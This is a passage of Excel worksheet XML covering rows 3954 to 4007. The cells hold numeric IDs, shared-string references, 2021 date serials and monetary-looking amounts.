      <c r="G3954" s="1">
        <v>44253</v>
      </c>
      <c r="H3954">
        <v>10000</v>
      </c>
      <c r="J3954" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3955" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3955">
        <v>24268</v>
      </c>
      <c r="B3955">
        <v>862</v>
      </c>
      <c r="C3955" t="s">
        <v>3051</v>
      </c>
      <c r="D3955" t="s">
        <v>10942</v>
      </c>
      <c r="E3955">
        <v>2</v>
      </c>
      <c r="F3955" t="s">
        <v>1030</v>
      </c>
      <c r="G3955" s="1">
        <v>44253</v>
      </c>
      <c r="H3955">
        <v>10000</v>
      </c>
      <c r="J3955" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3956" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3956">
        <v>24269</v>
      </c>
      <c r="B3956">
        <v>862</v>
      </c>
      <c r="C3956" t="s">
        <v>3051</v>
      </c>
      <c r="D3956" t="s">
        <v>10942</v>
      </c>
      <c r="E3956">
        <v>2</v>
      </c>
      <c r="F3956" t="s">
        <v>13191</v>
      </c>
      <c r="G3956" s="1">
        <v>44253</v>
      </c>
      <c r="H3956">
        <v>10000</v>
      </c>
      <c r="J3956" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="3957" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3957">
        <v>24270</v>
      </c>
      <c r="B3957">
        <v>1272</v>
      </c>
      <c r="C3957" t="s">
        <v>4333</v>
      </c>
      <c r="D3957" t="s">
        <v>13192</v>
      </c>
      <c r="E3957">
        <v>16</v>
      </c>
      <c r="F3957" t="s">
        <v>5224</v>
      </c>
      <c r="G3957" s="1">
        <v>44307</v>
      </c>
      <c r="H3957">
        <v>60000</v>
      </c>
      <c r="I3957" t="s">
        <v>13193</v>
      </c>
    </row>
    <row r="3958" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3958">
        <v>24271</v>
      </c>
      <c r="B3958">
        <v>1272</v>
      </c>
      <c r="C3958" t="s">
        <v>4333</v>
      </c>
      <c r="D3958" t="s">
        <v>13192</v>
      </c>
      <c r="E3958">
        <v>16</v>
      </c>
      <c r="F3958" t="s">
        <v>13194</v>
      </c>
      <c r="G3958" s="1">
        <v>44307</v>
      </c>
      <c r="H3958">
        <v>40000</v>
      </c>
      <c r="I3958" t="s">
        <v>13193</v>
      </c>
    </row>
    <row r="3959" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3959">
        <v>24272</v>
      </c>
      <c r="B3959">
        <v>1272</v>
      </c>
      <c r="C3959" t="s">
        <v>4333</v>
      </c>
      <c r="D3959" t="s">
        <v>13192</v>
      </c>
      <c r="E3959">
        <v>16</v>
      </c>
      <c r="F3959" t="s">
        <v>9437</v>
      </c>
      <c r="G3959" s="1">
        <v>44307</v>
      </c>
      <c r="H3959">
        <v>20000</v>
      </c>
      <c r="I3959" t="s">
        <v>13193</v>
      </c>
    </row>
    <row r="3960" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3960">
        <v>24273</v>
      </c>
      <c r="B3960">
        <v>1272</v>
      </c>
      <c r="C3960" t="s">
        <v>4333</v>
      </c>
      <c r="D3960" t="s">
        <v>13192</v>
      </c>
      <c r="E3960">
        <v>16</v>
      </c>
      <c r="F3960" t="s">
        <v>13195</v>
      </c>
      <c r="G3960" s="1">
        <v>44307</v>
      </c>
      <c r="H3960">
        <v>10000</v>
      </c>
      <c r="I3960" t="s">
        <v>13193</v>
      </c>
    </row>
    <row r="3961" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3961">
        <v>24274</v>
      </c>
      <c r="B3961">
        <v>1272</v>
      </c>
      <c r="C3961" t="s">
        <v>4333</v>
      </c>
      <c r="D3961" t="s">
        <v>13192</v>
      </c>
      <c r="E3961">
        <v>16</v>
      </c>
      <c r="F3961" t="s">
        <v>13196</v>
      </c>
      <c r="G3961" s="1">
        <v>44307</v>
      </c>
      <c r="H3961">
        <v>10000</v>
      </c>
      <c r="I3961" t="s">
        <v>13193</v>
      </c>
    </row>
    <row r="3962" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3962">
        <v>24275</v>
      </c>
      <c r="B3962">
        <v>1272</v>
      </c>
      <c r="C3962" t="s">
        <v>4333</v>
      </c>
      <c r="D3962" t="s">
        <v>13192</v>
      </c>
      <c r="E3962">
        <v>16</v>
      </c>
      <c r="F3962" t="s">
        <v>1746</v>
      </c>
      <c r="G3962" s="1">
        <v>44307</v>
      </c>
      <c r="H3962">
        <v>10000</v>
      </c>
      <c r="I3962" t="s">
        <v>13193</v>
      </c>
    </row>
    <row r="3963" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3963">
        <v>24276</v>
      </c>
      <c r="B3963">
        <v>1640</v>
      </c>
      <c r="C3963" t="s">
        <v>4351</v>
      </c>
      <c r="D3963" t="s">
        <v>13197</v>
      </c>
      <c r="E3963">
        <v>18</v>
      </c>
      <c r="F3963" t="s">
        <v>364</v>
      </c>
      <c r="G3963" s="1">
        <v>44265</v>
      </c>
      <c r="H3963">
        <v>5000</v>
      </c>
      <c r="J3963" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3964" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3964">
        <v>24277</v>
      </c>
      <c r="B3964">
        <v>2541</v>
      </c>
      <c r="C3964" t="s">
        <v>16523</v>
      </c>
      <c r="D3964" t="s">
        <v>16524</v>
      </c>
      <c r="E3964">
        <v>28</v>
      </c>
      <c r="F3964" t="s">
        <v>6917</v>
      </c>
      <c r="G3964" s="1">
        <v>44361</v>
      </c>
      <c r="H3964" s="4">
        <v>12000</v>
      </c>
      <c r="J3964" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3965" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3965">
        <v>24281</v>
      </c>
      <c r="B3965">
        <v>1509</v>
      </c>
      <c r="C3965" t="s">
        <v>4364</v>
      </c>
      <c r="D3965" t="s">
        <v>13198</v>
      </c>
      <c r="E3965">
        <v>2</v>
      </c>
      <c r="F3965" t="s">
        <v>13199</v>
      </c>
      <c r="G3965" s="1">
        <v>44260</v>
      </c>
      <c r="H3965">
        <v>600000</v>
      </c>
      <c r="I3965" t="s">
        <v>13200</v>
      </c>
    </row>
    <row r="3966" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3966">
        <v>24287</v>
      </c>
      <c r="B3966">
        <v>1386</v>
      </c>
      <c r="C3966" t="s">
        <v>4123</v>
      </c>
      <c r="D3966" t="s">
        <v>13201</v>
      </c>
      <c r="E3966">
        <v>13</v>
      </c>
      <c r="F3966" t="s">
        <v>13202</v>
      </c>
      <c r="G3966" s="1">
        <v>44291</v>
      </c>
      <c r="H3966">
        <v>178860</v>
      </c>
      <c r="I3966" t="s">
        <v>13203</v>
      </c>
    </row>
    <row r="3967" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3967">
        <v>24294</v>
      </c>
      <c r="B3967">
        <v>5299</v>
      </c>
      <c r="C3967" t="s">
        <v>8606</v>
      </c>
      <c r="D3967" t="s">
        <v>13204</v>
      </c>
      <c r="E3967">
        <v>7</v>
      </c>
      <c r="F3967" t="s">
        <v>1276</v>
      </c>
      <c r="G3967" s="1">
        <v>44315</v>
      </c>
      <c r="H3967">
        <v>3000</v>
      </c>
      <c r="I3967" t="s">
        <v>13205</v>
      </c>
    </row>
    <row r="3968" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3968">
        <v>24295</v>
      </c>
      <c r="B3968">
        <v>5310</v>
      </c>
      <c r="C3968" t="s">
        <v>8612</v>
      </c>
      <c r="D3968" t="s">
        <v>13206</v>
      </c>
      <c r="E3968">
        <v>10</v>
      </c>
      <c r="F3968" t="s">
        <v>7114</v>
      </c>
      <c r="G3968" s="1">
        <v>44263</v>
      </c>
      <c r="H3968">
        <v>600</v>
      </c>
      <c r="I3968" t="s">
        <v>13207</v>
      </c>
    </row>
    <row r="3969" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3969">
        <v>24296</v>
      </c>
      <c r="B3969">
        <v>5310</v>
      </c>
      <c r="C3969" t="s">
        <v>8612</v>
      </c>
      <c r="D3969" t="s">
        <v>13206</v>
      </c>
      <c r="E3969">
        <v>10</v>
      </c>
      <c r="F3969" t="s">
        <v>3341</v>
      </c>
      <c r="G3969" s="1">
        <v>44263</v>
      </c>
      <c r="H3969">
        <v>900</v>
      </c>
      <c r="I3969" t="s">
        <v>13207</v>
      </c>
    </row>
    <row r="3970" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3970">
        <v>24297</v>
      </c>
      <c r="B3970">
        <v>5310</v>
      </c>
      <c r="C3970" t="s">
        <v>8612</v>
      </c>
      <c r="D3970" t="s">
        <v>13206</v>
      </c>
      <c r="E3970">
        <v>10</v>
      </c>
      <c r="F3970" t="s">
        <v>9866</v>
      </c>
      <c r="G3970" s="1">
        <v>44263</v>
      </c>
      <c r="H3970">
        <v>720</v>
      </c>
      <c r="I3970" t="s">
        <v>13207</v>
      </c>
    </row>
    <row r="3971" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3971">
        <v>24300</v>
      </c>
      <c r="B3971">
        <v>1478</v>
      </c>
      <c r="C3971" t="s">
        <v>4358</v>
      </c>
      <c r="D3971" t="s">
        <v>13208</v>
      </c>
      <c r="E3971">
        <v>26</v>
      </c>
      <c r="F3971" t="s">
        <v>1746</v>
      </c>
      <c r="G3971" s="1">
        <v>44267</v>
      </c>
      <c r="H3971">
        <v>925000</v>
      </c>
      <c r="J3971" t="s">
        <v>12998</v>
      </c>
    </row>
    <row r="3972" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3972">
        <v>24301</v>
      </c>
      <c r="B3972">
        <v>1455</v>
      </c>
      <c r="C3972" t="s">
        <v>4302</v>
      </c>
      <c r="D3972" t="s">
        <v>13209</v>
      </c>
      <c r="E3972">
        <v>14</v>
      </c>
      <c r="F3972" t="s">
        <v>13210</v>
      </c>
      <c r="G3972" s="1">
        <v>44272</v>
      </c>
      <c r="H3972">
        <v>30000</v>
      </c>
      <c r="I3972" t="s">
        <v>9550</v>
      </c>
      <c r="J3972" t="s">
        <v>10331</v>
      </c>
    </row>
    <row r="3973" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3973">
        <v>24302</v>
      </c>
      <c r="B3973">
        <v>1455</v>
      </c>
      <c r="C3973" t="s">
        <v>4302</v>
      </c>
      <c r="D3973" t="s">
        <v>13209</v>
      </c>
      <c r="E3973">
        <v>14</v>
      </c>
      <c r="F3973" t="s">
        <v>13211</v>
      </c>
      <c r="G3973" s="1">
        <v>44272</v>
      </c>
      <c r="H3973">
        <v>30000</v>
      </c>
      <c r="I3973" t="s">
        <v>13212</v>
      </c>
      <c r="J3973" t="s">
        <v>13213</v>
      </c>
    </row>
    <row r="3974" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3974">
        <v>24303</v>
      </c>
      <c r="B3974">
        <v>1455</v>
      </c>
      <c r="C3974" t="s">
        <v>4302</v>
      </c>
      <c r="D3974" t="s">
        <v>13209</v>
      </c>
      <c r="E3974">
        <v>14</v>
      </c>
      <c r="F3974" t="s">
        <v>9459</v>
      </c>
      <c r="G3974" s="1">
        <v>44272</v>
      </c>
      <c r="H3974">
        <v>80000</v>
      </c>
      <c r="I3974" t="s">
        <v>9550</v>
      </c>
      <c r="J3974" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3975" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3975">
        <v>24304</v>
      </c>
      <c r="B3975">
        <v>1455</v>
      </c>
      <c r="C3975" t="s">
        <v>4302</v>
      </c>
      <c r="D3975" t="s">
        <v>13209</v>
      </c>
      <c r="E3975">
        <v>14</v>
      </c>
      <c r="F3975" t="s">
        <v>9437</v>
      </c>
      <c r="G3975" s="1">
        <v>44272</v>
      </c>
      <c r="H3975">
        <v>8000</v>
      </c>
      <c r="J3975" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3976" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3976">
        <v>24305</v>
      </c>
      <c r="B3976">
        <v>1455</v>
      </c>
      <c r="C3976" t="s">
        <v>4302</v>
      </c>
      <c r="D3976" t="s">
        <v>13209</v>
      </c>
      <c r="E3976">
        <v>14</v>
      </c>
      <c r="F3976" t="s">
        <v>13214</v>
      </c>
      <c r="G3976" s="1">
        <v>44272</v>
      </c>
      <c r="H3976">
        <v>5000</v>
      </c>
      <c r="I3976" t="s">
        <v>13215</v>
      </c>
    </row>
    <row r="3977" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3977">
        <v>24306</v>
      </c>
      <c r="B3977">
        <v>1515</v>
      </c>
      <c r="C3977" t="s">
        <v>4098</v>
      </c>
      <c r="D3977" t="s">
        <v>12923</v>
      </c>
      <c r="E3977">
        <v>12</v>
      </c>
      <c r="F3977" t="s">
        <v>13216</v>
      </c>
      <c r="G3977" s="1">
        <v>44258</v>
      </c>
      <c r="H3977">
        <v>0</v>
      </c>
      <c r="I3977" t="s">
        <v>12926</v>
      </c>
    </row>
    <row r="3978" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3978">
        <v>24307</v>
      </c>
      <c r="B3978">
        <v>5293</v>
      </c>
      <c r="C3978" t="s">
        <v>8596</v>
      </c>
      <c r="D3978" t="s">
        <v>13217</v>
      </c>
      <c r="E3978">
        <v>14</v>
      </c>
      <c r="F3978" t="s">
        <v>13218</v>
      </c>
      <c r="G3978" s="1">
        <v>44258</v>
      </c>
      <c r="H3978">
        <v>5000000</v>
      </c>
      <c r="I3978" t="s">
        <v>13219</v>
      </c>
    </row>
    <row r="3979" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3979">
        <v>24308</v>
      </c>
      <c r="B3979">
        <v>5326</v>
      </c>
      <c r="C3979" t="s">
        <v>8621</v>
      </c>
      <c r="D3979" t="s">
        <v>13220</v>
      </c>
      <c r="E3979">
        <v>31</v>
      </c>
      <c r="F3979" t="s">
        <v>13221</v>
      </c>
      <c r="G3979" s="1">
        <v>44281</v>
      </c>
      <c r="H3979">
        <v>15000</v>
      </c>
      <c r="I3979" t="s">
        <v>13222</v>
      </c>
    </row>
    <row r="3980" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3980">
        <v>24309</v>
      </c>
      <c r="B3980">
        <v>5326</v>
      </c>
      <c r="C3980" t="s">
        <v>8621</v>
      </c>
      <c r="D3980" t="s">
        <v>13220</v>
      </c>
      <c r="E3980">
        <v>31</v>
      </c>
      <c r="F3980" t="s">
        <v>13223</v>
      </c>
      <c r="G3980" s="1">
        <v>44281</v>
      </c>
      <c r="H3980">
        <v>16000</v>
      </c>
      <c r="I3980" t="s">
        <v>13222</v>
      </c>
    </row>
    <row r="3981" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3981">
        <v>24310</v>
      </c>
      <c r="B3981">
        <v>5326</v>
      </c>
      <c r="C3981" t="s">
        <v>8621</v>
      </c>
      <c r="D3981" t="s">
        <v>13220</v>
      </c>
      <c r="E3981">
        <v>31</v>
      </c>
      <c r="F3981" t="s">
        <v>3763</v>
      </c>
      <c r="G3981" s="1">
        <v>44281</v>
      </c>
      <c r="H3981">
        <v>15000</v>
      </c>
      <c r="I3981" t="s">
        <v>13222</v>
      </c>
    </row>
    <row r="3982" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3982">
        <v>24311</v>
      </c>
      <c r="B3982">
        <v>1612</v>
      </c>
      <c r="C3982" t="s">
        <v>16525</v>
      </c>
      <c r="D3982" t="s">
        <v>16526</v>
      </c>
      <c r="E3982">
        <v>11</v>
      </c>
      <c r="F3982" t="s">
        <v>9438</v>
      </c>
      <c r="G3982" s="1">
        <v>44274</v>
      </c>
      <c r="H3982" s="4">
        <v>300000</v>
      </c>
      <c r="I3982" t="s">
        <v>13224</v>
      </c>
    </row>
    <row r="3983" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3983">
        <v>24312</v>
      </c>
      <c r="B3983">
        <v>1612</v>
      </c>
      <c r="C3983" t="s">
        <v>16525</v>
      </c>
      <c r="D3983" t="s">
        <v>16526</v>
      </c>
      <c r="E3983">
        <v>11</v>
      </c>
      <c r="F3983" t="s">
        <v>2924</v>
      </c>
      <c r="G3983" s="1">
        <v>44274</v>
      </c>
      <c r="H3983" s="4">
        <v>300000</v>
      </c>
      <c r="I3983" t="s">
        <v>13224</v>
      </c>
    </row>
    <row r="3984" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3984">
        <v>24313</v>
      </c>
      <c r="B3984">
        <v>318</v>
      </c>
      <c r="C3984" t="s">
        <v>953</v>
      </c>
      <c r="D3984" t="s">
        <v>13225</v>
      </c>
      <c r="E3984">
        <v>27</v>
      </c>
      <c r="F3984" t="s">
        <v>7241</v>
      </c>
      <c r="G3984" s="1">
        <v>44271</v>
      </c>
      <c r="H3984">
        <v>0</v>
      </c>
      <c r="I3984" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3985" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3985">
        <v>24314</v>
      </c>
      <c r="B3985">
        <v>1430</v>
      </c>
      <c r="C3985" t="s">
        <v>2867</v>
      </c>
      <c r="D3985" t="s">
        <v>13226</v>
      </c>
      <c r="E3985">
        <v>13</v>
      </c>
      <c r="F3985" t="s">
        <v>2924</v>
      </c>
      <c r="G3985" s="1">
        <v>44323</v>
      </c>
      <c r="H3985">
        <v>0</v>
      </c>
      <c r="I3985" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="3986" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3986">
        <v>24315</v>
      </c>
      <c r="B3986">
        <v>1430</v>
      </c>
      <c r="C3986" t="s">
        <v>2867</v>
      </c>
      <c r="D3986" t="s">
        <v>13226</v>
      </c>
      <c r="E3986">
        <v>13</v>
      </c>
      <c r="F3986" t="s">
        <v>9438</v>
      </c>
      <c r="G3986" s="1">
        <v>44323</v>
      </c>
      <c r="H3986">
        <v>0</v>
      </c>
      <c r="I3986" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="3987" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3987">
        <v>24316</v>
      </c>
      <c r="B3987">
        <v>1430</v>
      </c>
      <c r="C3987" t="s">
        <v>2867</v>
      </c>
      <c r="D3987" t="s">
        <v>13226</v>
      </c>
      <c r="E3987">
        <v>13</v>
      </c>
      <c r="F3987" t="s">
        <v>9941</v>
      </c>
      <c r="G3987" s="1">
        <v>44323</v>
      </c>
      <c r="H3987">
        <v>0</v>
      </c>
      <c r="I3987" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="3988" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3988">
        <v>24317</v>
      </c>
      <c r="B3988">
        <v>318</v>
      </c>
      <c r="C3988" t="s">
        <v>953</v>
      </c>
      <c r="D3988" t="s">
        <v>13225</v>
      </c>
      <c r="E3988">
        <v>27</v>
      </c>
      <c r="F3988" t="s">
        <v>13227</v>
      </c>
      <c r="G3988" s="1">
        <v>44271</v>
      </c>
      <c r="H3988">
        <v>1239810</v>
      </c>
      <c r="I3988" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3989" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3989">
        <v>24318</v>
      </c>
      <c r="B3989">
        <v>318</v>
      </c>
      <c r="C3989" t="s">
        <v>953</v>
      </c>
      <c r="D3989" t="s">
        <v>13225</v>
      </c>
      <c r="E3989">
        <v>27</v>
      </c>
      <c r="F3989" t="s">
        <v>13228</v>
      </c>
      <c r="G3989" s="1">
        <v>44271</v>
      </c>
      <c r="H3989">
        <v>0</v>
      </c>
      <c r="I3989" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3990" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3990">
        <v>24319</v>
      </c>
      <c r="B3990">
        <v>318</v>
      </c>
      <c r="C3990" t="s">
        <v>953</v>
      </c>
      <c r="D3990" t="s">
        <v>13225</v>
      </c>
      <c r="E3990">
        <v>27</v>
      </c>
      <c r="F3990" t="s">
        <v>1746</v>
      </c>
      <c r="G3990" s="1">
        <v>44271</v>
      </c>
      <c r="H3990">
        <v>0</v>
      </c>
      <c r="I3990" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3991" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3991">
        <v>24322</v>
      </c>
      <c r="B3991">
        <v>1570</v>
      </c>
      <c r="C3991" t="s">
        <v>4382</v>
      </c>
      <c r="D3991" t="s">
        <v>9581</v>
      </c>
      <c r="E3991">
        <v>33</v>
      </c>
      <c r="F3991" t="s">
        <v>3763</v>
      </c>
      <c r="G3991" s="1">
        <v>44281</v>
      </c>
      <c r="H3991">
        <v>500000</v>
      </c>
      <c r="I3991" t="s">
        <v>9522</v>
      </c>
      <c r="J3991" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3992" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3992">
        <v>24323</v>
      </c>
      <c r="B3992">
        <v>1570</v>
      </c>
      <c r="C3992" t="s">
        <v>4382</v>
      </c>
      <c r="D3992" t="s">
        <v>9581</v>
      </c>
      <c r="E3992">
        <v>33</v>
      </c>
      <c r="F3992" t="s">
        <v>9756</v>
      </c>
      <c r="G3992" s="1">
        <v>44281</v>
      </c>
      <c r="H3992">
        <v>500000</v>
      </c>
      <c r="I3992" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3993" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3993">
        <v>24324</v>
      </c>
      <c r="B3993">
        <v>1206</v>
      </c>
      <c r="C3993" t="s">
        <v>4370</v>
      </c>
      <c r="D3993" t="s">
        <v>13229</v>
      </c>
      <c r="E3993">
        <v>11</v>
      </c>
      <c r="F3993" t="s">
        <v>3686</v>
      </c>
      <c r="G3993" s="1">
        <v>44284</v>
      </c>
      <c r="H3993">
        <v>40000</v>
      </c>
      <c r="I3993" t="s">
        <v>9571</v>
      </c>
    </row>
    <row r="3994" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3994">
        <v>24325</v>
      </c>
      <c r="B3994">
        <v>1206</v>
      </c>
      <c r="C3994" t="s">
        <v>4370</v>
      </c>
      <c r="D3994" t="s">
        <v>13229</v>
      </c>
      <c r="E3994">
        <v>11</v>
      </c>
      <c r="F3994" t="s">
        <v>9430</v>
      </c>
      <c r="G3994" s="1">
        <v>44284</v>
      </c>
      <c r="H3994">
        <v>40000</v>
      </c>
      <c r="I3994" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="3995" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3995">
        <v>24326</v>
      </c>
      <c r="B3995">
        <v>1497</v>
      </c>
      <c r="C3995" t="s">
        <v>4255</v>
      </c>
      <c r="D3995" t="s">
        <v>13230</v>
      </c>
      <c r="E3995">
        <v>13</v>
      </c>
      <c r="F3995" t="s">
        <v>764</v>
      </c>
      <c r="G3995" s="1">
        <v>44292</v>
      </c>
      <c r="H3995">
        <v>100000</v>
      </c>
      <c r="J3995" t="s">
        <v>13231</v>
      </c>
    </row>
    <row r="3996" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3996">
        <v>24327</v>
      </c>
      <c r="B3996">
        <v>1497</v>
      </c>
      <c r="C3996" t="s">
        <v>4255</v>
      </c>
      <c r="D3996" t="s">
        <v>13230</v>
      </c>
      <c r="E3996">
        <v>13</v>
      </c>
      <c r="F3996" t="s">
        <v>4037</v>
      </c>
      <c r="G3996" s="1">
        <v>44292</v>
      </c>
      <c r="H3996">
        <v>600000</v>
      </c>
      <c r="J3996" t="s">
        <v>13232</v>
      </c>
    </row>
    <row r="3997" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3997">
        <v>24328</v>
      </c>
      <c r="B3997">
        <v>1497</v>
      </c>
      <c r="C3997" t="s">
        <v>4255</v>
      </c>
      <c r="D3997" t="s">
        <v>13230</v>
      </c>
      <c r="E3997">
        <v>13</v>
      </c>
      <c r="F3997" t="s">
        <v>12255</v>
      </c>
      <c r="G3997" s="1">
        <v>44292</v>
      </c>
      <c r="H3997">
        <v>20000</v>
      </c>
      <c r="J3997" t="s">
        <v>13233</v>
      </c>
    </row>
    <row r="3998" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3998">
        <v>24329</v>
      </c>
      <c r="B3998">
        <v>1497</v>
      </c>
      <c r="C3998" t="s">
        <v>4255</v>
      </c>
      <c r="D3998" t="s">
        <v>13230</v>
      </c>
      <c r="E3998">
        <v>13</v>
      </c>
      <c r="F3998" t="s">
        <v>6635</v>
      </c>
      <c r="G3998" s="1">
        <v>44292</v>
      </c>
      <c r="H3998">
        <v>6000</v>
      </c>
      <c r="J3998" t="s">
        <v>13234</v>
      </c>
    </row>
    <row r="3999" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3999">
        <v>24330</v>
      </c>
      <c r="B3999">
        <v>1497</v>
      </c>
      <c r="C3999" t="s">
        <v>4255</v>
      </c>
      <c r="D3999" t="s">
        <v>13230</v>
      </c>
      <c r="E3999">
        <v>13</v>
      </c>
      <c r="F3999" t="s">
        <v>13235</v>
      </c>
      <c r="G3999" s="1">
        <v>44292</v>
      </c>
      <c r="H3999">
        <v>30000</v>
      </c>
      <c r="J3999" t="s">
        <v>13236</v>
      </c>
    </row>
    <row r="4000" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4000">
        <v>24331</v>
      </c>
      <c r="B4000">
        <v>1497</v>
      </c>
      <c r="C4000" t="s">
        <v>4255</v>
      </c>
      <c r="D4000" t="s">
        <v>13230</v>
      </c>
      <c r="E4000">
        <v>13</v>
      </c>
      <c r="F4000" t="s">
        <v>13237</v>
      </c>
      <c r="G4000" s="1">
        <v>44292</v>
      </c>
      <c r="H4000">
        <v>10000</v>
      </c>
      <c r="J4000" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4001" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4001">
        <v>24332</v>
      </c>
      <c r="B4001">
        <v>5242</v>
      </c>
      <c r="C4001" t="s">
        <v>8357</v>
      </c>
      <c r="D4001" t="s">
        <v>13238</v>
      </c>
      <c r="E4001">
        <v>18</v>
      </c>
      <c r="F4001" t="s">
        <v>1016</v>
      </c>
      <c r="G4001" s="1">
        <v>44323</v>
      </c>
      <c r="H4001">
        <v>12000</v>
      </c>
      <c r="I4001" t="s">
        <v>13239</v>
      </c>
    </row>
    <row r="4002" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4002">
        <v>24333</v>
      </c>
      <c r="B4002">
        <v>5242</v>
      </c>
      <c r="C4002" t="s">
        <v>8357</v>
      </c>
      <c r="D4002" t="s">
        <v>13238</v>
      </c>
      <c r="E4002">
        <v>18</v>
      </c>
      <c r="F4002" t="s">
        <v>12739</v>
      </c>
      <c r="G4002" s="1">
        <v>44323</v>
      </c>
      <c r="H4002">
        <v>24000</v>
      </c>
      <c r="I4002" t="s">
        <v>13240</v>
      </c>
    </row>
    <row r="4003" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4003">
        <v>24334</v>
      </c>
      <c r="B4003">
        <v>5242</v>
      </c>
      <c r="C4003" t="s">
        <v>8357</v>
      </c>
      <c r="D4003" t="s">
        <v>13238</v>
      </c>
      <c r="E4003">
        <v>18</v>
      </c>
      <c r="F4003" t="s">
        <v>4686</v>
      </c>
      <c r="G4003" s="1">
        <v>44323</v>
      </c>
      <c r="H4003">
        <v>2400</v>
      </c>
      <c r="I4003" t="s">
        <v>13241</v>
      </c>
    </row>
    <row r="4004" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4004">
        <v>24335</v>
      </c>
      <c r="B4004">
        <v>5242</v>
      </c>
      <c r="C4004" t="s">
        <v>8357</v>
      </c>
      <c r="D4004" t="s">
        <v>13238</v>
      </c>
      <c r="E4004">
        <v>18</v>
      </c>
      <c r="F4004" t="s">
        <v>13242</v>
      </c>
      <c r="G4004" s="1">
        <v>44323</v>
      </c>
      <c r="H4004">
        <v>2400</v>
      </c>
      <c r="I4004" t="s">
        <v>13243</v>
      </c>
    </row>
    <row r="4005" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4005">
        <v>24337</v>
      </c>
      <c r="B4005">
        <v>82</v>
      </c>
      <c r="C4005" t="s">
        <v>2242</v>
      </c>
      <c r="D4005" t="s">
        <v>13244</v>
      </c>
      <c r="E4005">
        <v>17</v>
      </c>
      <c r="F4005" t="s">
        <v>2236</v>
      </c>
      <c r="G4005" s="1">
        <v>44287</v>
      </c>
      <c r="H4005">
        <v>307197</v>
      </c>
      <c r="J4005" t="s">
        <v>13245</v>
      </c>
    </row>
    <row r="4006" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4006">
        <v>24338</v>
      </c>
      <c r="B4006">
        <v>82</v>
      </c>
      <c r="C4006" t="s">
        <v>2242</v>
      </c>
      <c r="D4006" t="s">
        <v>13244</v>
      </c>
      <c r="E4006">
        <v>17</v>
      </c>
      <c r="F4006" t="s">
        <v>13246</v>
      </c>
      <c r="G4006" s="1">
        <v>44287</v>
      </c>
      <c r="H4006">
        <v>1650</v>
      </c>
      <c r="J4006" t="s">
        <v>13247</v>
      </c>
    </row>
    <row r="4007" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4007">
        <v>24339</v>
      </c>
      <c r="B4007">
        <v>117</v>
      </c>
      <c r="C4007" t="s">
        <v>2280</v>
      </c>
      <c r="D4007" t="s">
        <v>13248</v>
      </c>
      <c r="E4007">
        <v>12</v>
      </c>
      <c r="F4007" t="s">
        <v>13249</v>
      </c>
      <c r="G4007" s="1">
        <v>44286</v>
      </c>
      <c r="H4007">
        <v>75000</v>
      </c>
